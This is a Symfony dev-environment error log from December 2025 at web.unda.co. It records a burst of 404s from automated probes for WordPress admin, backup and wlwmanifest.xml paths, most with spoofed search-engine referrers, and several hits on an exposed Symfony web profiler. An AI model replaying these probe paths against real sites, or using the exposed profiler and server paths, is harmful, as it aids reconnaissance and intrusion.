[2025-12-21 00:04:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mini" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mini\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/themes/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/themes/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/ID3/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/ID3/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/certificates/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/certificates/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/crop/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/crop/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:05:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:05:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:05:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:06:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"662038","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/662038?panel=db","method":"GET"} []
[2025-12-21 00:06:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 00:06:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //feed/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //feed/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:06:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //blog/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //blog/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //web/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //web/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wordpress/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wordpress/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2020/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2020/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:07:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2019/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2019/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:07:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2021/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2021/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:07:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //shop/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //shop/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:07:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp1/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp1/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:07:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //test/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //test/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:07:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //site/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //site/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:07:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //cms/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //cms/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:08:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=swiftmailer","method":"GET"} []
[2025-12-21 00:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
